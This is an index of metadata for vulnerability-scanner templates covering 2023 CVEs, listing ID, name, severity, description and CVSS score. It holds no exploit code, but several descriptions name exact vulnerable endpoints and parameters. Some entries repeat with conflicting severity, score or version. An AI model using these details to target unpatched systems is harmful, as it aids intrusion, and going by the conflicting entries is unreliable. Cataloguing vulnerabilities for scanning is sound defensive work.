{"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"}
{"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"}
{"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"}
{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"}
{"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"}
{"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"high","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"}
{"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"}
{"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"}
{"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"}
{"ID":"CVE-2023-34537","Info":{"Name":"Hoteldruid 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-34537.yaml"}
{"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"critical","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"}
{"ID":"CVE-2023-34599","Info":{"Name":"Gibbon v25.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-34599.yaml"}
{"ID":"CVE-2023-3460","Info":{"Name":"Ultimate Member \u003c 2.6.7 - Unauthenticated Privilege Escalation","Severity":"critical","Description":"The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3460.yaml"}
{"ID":"CVE-2023-34659","Info":{"Name":"JeecgBoot 3.5.0 - SQL Injection","Severity":"critical","Description":"jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34659.yaml"}
{"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"}
{"ID":"CVE-2023-34751","Info":{"Name":"bloofoxCMS v0.5.2.1 - SQL Injection","Severity":"critical","Description":"bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user\u0026page=groups\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34751.yaml"}
{"ID":"CVE-2023-34752","Info":{"Name":"bloofoxCMS v0.5.2.1 - SQL Injection","Severity":"critical","Description":"bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings\u0026page=lang\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34752.yaml"}
{"ID":"CVE-2023-34753","Info":{"Name":"bloofoxCMS v0.5.2.1 - SQL Injection","Severity":"critical","Description":"bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings\u0026page=tmpl\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34753.yaml"}
{"ID":"CVE-2023-34755","Info":{"Name":"bloofoxCMS v0.5.2.1 - SQL Injection","Severity":"critical","Description":"bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34755.yaml"}
{"ID":"CVE-2023-34756","Info":{"Name":"Bloofox v0.5.2.1 - SQL Injection","Severity":"critical","Description":"Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings\u0026page=charset\u0026action=edit.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34756.yaml"}
{"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.7 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"}
{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"}
{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"}
{"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"}
{"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"}
{"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"}
{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"}
{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"}
{"ID":"CVE-2023-35885","Info":{"Name":"Cloudpanel 2 \u003c 2.3.1 - Remote Code Execution","Severity":"critical","Description":"CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35885.yaml"}
{"ID":"CVE-2023-36144","Info":{"Name":"Intelbras Switch - Information Disclosure","Severity":"high","Description":"An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36144.yaml"}
{"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"}
{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
{"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"}
{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"medium","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"}
{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"critical","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"}
{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
{"ID":"CVE-2023-3710","Info":{"Name":"Honeywell PM43 Printers - Command Injection","Severity":"critical","Description":"Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3710.yaml"}
{"ID":"CVE-2023-37265","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"}
{"ID":"CVE-2023-37266","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"}
{"ID":"CVE-2023-37270","Info":{"Name":"Piwigo 13.7.0 - SQL Injection","Severity":"high","Description":"Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-37270.yaml"}
{"ID":"CVE-2023-37462","Info":{"Name":"XWiki Platform - Remote Code Execution","Severity":"high","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-37462.yaml"}
{"ID":"CVE-2023-37474","Info":{"Name":"Copyparty \u003c= 1.8.2 - Directory Traversal","Severity":"high","Description":"Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-37474.yaml"}
{"ID":"CVE-2023-37580","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"medium","Description":"Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37580.yaml"}
{"ID":"CVE-2023-37629","Info":{"Name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","Severity":"critical","Description":"Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37629.yaml"}
{"ID":"CVE-2023-3765","Info":{"Name":"MLflow Absolute Path Traversal","Severity":"critical","Description":"Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-3765.yaml"}
{"ID":"CVE-2023-37679","Info":{"Name":"NextGen Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37679.yaml"}
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
{"ID":"CVE-2023-38433","Info":{"Name":"Fujitsu IP Series - Hardcoded Credentials","Severity":"high","Description":"Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38433.yaml"}
{"ID":"CVE-2023-3844","Info":{"Name":"MooDating 1.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3844.yaml"}
{"ID":"CVE-2023-3845","Info":{"Name":"MooDating 1.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3845.yaml"}
{"ID":"CVE-2023-3846","Info":{"Name":"MooDating 1.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3846.yaml"}
{"ID":"CVE-2023-3847","Info":{"Name":"MooDating 1.2 - Cross-Site scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3847.yaml"}
{"ID":"CVE-2023-3848","Info":{"Name":"MooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3848.yaml"}
{"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"}
{"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"}
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
{"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"}
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
{"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"}
{"ID":"CVE-2023-39109","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39109.yaml"}
{"ID":"CVE-2023-39110","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39110.yaml"}
{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"}
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"}
{"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"}
